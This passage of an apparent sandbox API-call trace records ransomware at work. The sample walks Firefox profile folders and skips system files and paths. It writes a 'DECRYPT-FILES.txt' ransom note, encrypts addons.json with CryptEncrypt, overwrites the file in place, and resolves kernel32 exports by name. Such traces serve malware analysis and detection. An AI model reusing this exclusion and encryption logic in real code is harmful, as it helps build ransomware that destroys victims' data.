HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="AhnLab") returned 0x0 [0080.591] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.591] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0080.591] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.591] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\jkbimi8.tmp") returned 83 [0080.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0080.592] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0080.592] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.592] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\DECRYPT-FILES.txt") returned 89 [0080.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0080.593] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0080.593] CloseHandle (hObject=0x454) returned 1 [0080.594] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0080.594] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0080.594] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0080.594] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.594] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.594] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.594] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.594] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3bc9a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.594] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.594] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3bc9a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.594] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.594] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.594] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.594] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.594] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.594] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.594] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.594] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.594] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.594] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.594] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.594] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.594] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.594] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.594] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.594] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0080.594] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.594] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0080.594] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\jkbimi8.tmp" [0080.595] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.595] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.595] CloseHandle (hObject=0x0) returned 0 [0080.595] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.595] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="silmbjec.default", cAlternateFileName="SILMBJ~1.DEF")) returned 1 [0080.595] lstrcmpW (lpString1="silmbjec.default", lpString2=".") returned 1 [0080.595] lstrcmpW (lpString1="silmbjec.default", lpString2="..") returned 1 [0080.595] lstrcatW (in: lpString1="silmbjec.default", lpString2="\\" | out: lpString1="silmbjec.default\\") returned="silmbjec.default\\" [0080.595] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0080.595] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\Program Files") returned 0x0 [0080.595] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch=":\\Windows") returned 0x0 [0080.595] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\Games\\") returned 0x0 [0080.595] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.595] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.595] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\All Users") returned 0x0 [0080.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="AhnLab") returned 0x0 [0080.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.596] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0080.596] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.596] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\\\jkbimi8.tmp") returned 100 [0080.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0080.598] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0080.598] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.598] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\\\DECRYPT-FILES.txt") returned 106 [0080.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0080.599] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0080.599] CloseHandle (hObject=0x45c) returned 1 [0080.600] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0080.600] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*" [0080.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0080.600] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.600] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.601] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.601] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.601] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb76a6d10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb76a6d10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb76a6d10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="addons.json", cAlternateFileName="ADDONS~1.JSO")) returned 1 [0080.601] lstrcmpiW (lpString1="addons.json", lpString2="DECRYPT-FILES.txt") returned -1 [0080.601] lstrcmpiW (lpString1="addons.json", lpString2="autorun.inf") returned -1 [0080.601] lstrcmpiW (lpString1="addons.json", lpString2="boot.ini") returned -1 [0080.601] lstrcmpiW (lpString1="addons.json", lpString2="desktop.ini") returned -1 [0080.601] lstrcmpiW (lpString1="addons.json", lpString2="ntuser.dat") returned -1 [0080.601] lstrcmpiW (lpString1="addons.json", lpString2="iconcache.db") returned -1 [0080.601] lstrcmpiW (lpString1="addons.json", lpString2="bootsect.bak") returned -1 [0080.601] lstrcmpiW (lpString1="addons.json", lpString2="ntuser.dat.log") returned -1 [0080.601] lstrcmpiW (lpString1="addons.json", lpString2="thumbs.db") returned -1 [0080.601] lstrcmpiW (lpString1="addons.json", lpString2="Bootfont.bin") returned -1 [0080.601] lstrlenW (lpString="addons.json") returned 11 [0080.601] lstrcmpiW (lpString1="json", lpString2="lnk") returned -1 [0080.601] lstrcmpiW (lpString1="json", lpString2="exe") returned 1 [0080.601] lstrcmpiW (lpString1="json", lpString2="sys") returned -1 [0080.601] lstrcmpiW (lpString1="json", lpString2="dll") returned 1 [0080.601] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0080.601] lstrlenW (lpString="addons.json") returned 11 [0080.601] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0080.601] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="addons.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" [0080.602] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.603] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=24) returned 1 [0080.603] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.603] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.603] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.603] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.603] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.604] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.604] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.605] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.605] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.605] CloseHandle (hObject=0x464) returned 1 [0080.605] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.605] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.606] CloseHandle (hObject=0x0) returned 0 [0080.606] CloseHandle (hObject=0x460) returned 1 [0080.606] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.607] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.607] GetTickCount () returned 0x114ca32 [0080.607] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.607] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.607] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.607] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.608] lstrlenA (lpString="kernel32.dll") returned 12 [0080.608] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.608] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.608] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.608] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.608] lstrlenA (lpString="ADDATOMA") returned 8 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.608] lstrlenA (lpString="ADDATOMW") returned 8 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.608] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.608] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.608] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.608] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.608] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.608] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.608] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.608] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.609] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.609] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.609] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.609] lstrcpyA (in: 